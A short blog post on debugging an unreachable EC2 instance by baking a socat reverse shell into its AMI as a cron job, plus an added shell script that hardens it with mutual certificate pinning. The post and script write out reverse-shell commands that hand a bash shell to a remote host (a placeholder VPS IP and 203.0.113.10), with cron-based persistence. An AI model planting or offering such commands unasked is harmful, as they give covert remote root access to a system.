Reverse shell via socat
Written by Eric Schwimmer
I had a grumpy EC2 instance that wasn't allowing any inbound connections after it initialized (turns out it had a rogue firewalld rule that was shutting me down). I was able to get in to debug it by running this on my VPS:
openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.pem && \
  socat `tty`,raw,echo=0 openssl-listen:1237,reuseaddr,cert=cert.pem,verify=0
And then setting this up as a cron job in the grumpy EC2 instance's AMI:
* * * * * ps -ef | grep -q '[o]penssl-connect' || socat openssl-connect:<MY_VPS_IP>:1237,verify=0 exec:bash,pty,stderr,setsid
One minute after the EC2 instance came up, bam, I had a remote shell running on my VPS.
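Two things a practitioner would want beyond the commands above: the crontab entry has to stay on one line (crontab(5) has no backslash continuation), and verify=0 on both ends means neither side authenticates the other, so anyone who can reach port 1237 on the VPS can connect to the listener, and the instance would hand its root shell to whatever answers at that IP:port. The script below is an added example, not the post's own commands: it generates a separate key/cert pair per side and emits the listener, connector and cron line with cafile pinning in both directions. The VPS address 203.0.113.10, the ./certs directory and the CN values are hypothetical; the socat options cert=, key=, cafile=, verify= and exec:...,sigint,sane are real socat options.

```shell
#!/bin/sh
# Added example, not from the original post: the socat reverse shell with the
# peer certificate pinned on both ends instead of verify=0 on both ends.
# Hypothetical values: VPS 203.0.113.10 (TEST-NET-3), port 1237, certs in ./certs.
set -eu

CERT_DIR="${CERT_DIR:-./certs}"
VPS_IP="${VPS_IP:-203.0.113.10}"
PORT="${PORT:-1237}"

# One self-signed key/cert pair per side, key written 0600 and kept apart from
# the certificate, so only the .crt files cross the wire (vps.crt is baked
# into the AMI, client.crt is copied to the VPS).  Needs openssl.
gen_pair() {
    name="$1"; cn="$2"
    mkdir -p "$CERT_DIR"
    ( umask 077; openssl req -new -x509 -days 365 -nodes -newkey rsa:2048 \
        -subj "/CN=$cn" -keyout "$CERT_DIR/$name.key" -out "$CERT_DIR/$name.crt" 2>/dev/null )
}

# Listener on the VPS.  cafile=client.crt with verify=1 means only a peer that
# presents client.crt and holds client.key gets the terminal; a stranger who
# finds the open port is rejected during the TLS handshake.
listener_cmd() {
    printf 'socat `tty`,raw,echo=0 openssl-listen:%s,reuseaddr,cert=%s/vps.crt,key=%s/vps.key,cafile=%s/client.crt,verify=1\n' \
        "$PORT" "$CERT_DIR" "$CERT_DIR" "$CERT_DIR"
}

# Connector on the instance.  cafile=vps.crt pins the listener's certificate,
# so the shell only goes to the real VPS, not to whoever answers on that
# IP:port.  sigint,sane keep Ctrl-C and terminal modes sensible in the pty.
connector_cmd() {
    printf 'socat openssl-connect:%s:%s,cert=%s/client.crt,key=%s/client.key,cafile=%s/vps.crt,verify=1 exec:bash,pty,stderr,setsid,sigint,sane\n' \
        "$VPS_IP" "$PORT" "$CERT_DIR" "$CERT_DIR" "$CERT_DIR"
}

# Crontab entry for the AMI, on a single line: crontab(5) has no backslash
# continuation, so a wrapped entry would be parsed as two broken lines.
# The [o] trick stops grep from matching its own command line in ps output.
cron_line() {
    printf '* * * * * ps -ef | grep -q "[o]penssl-connect" || %s\n' "$(connector_cmd)"
}

case "${1:-}" in
    certs)    gen_pair vps vps-listener; gen_pair client ec2-connector ;;
    listener) listener_cmd ;;
    cron)     cron_line ;;
    *)        echo "usage: $0 certs|listener|cron" >&2 ;;
esac
```

Run it with `certs` once on the VPS, ship client.crt/client.key and vps.crt into the AMI, then `listener` prints the command to run on the VPS and `cron` prints the line to drop into the instance's crontab. The listener still attaches your live tty to whatever connects, so keep the port firewalled to the instance's egress address as well.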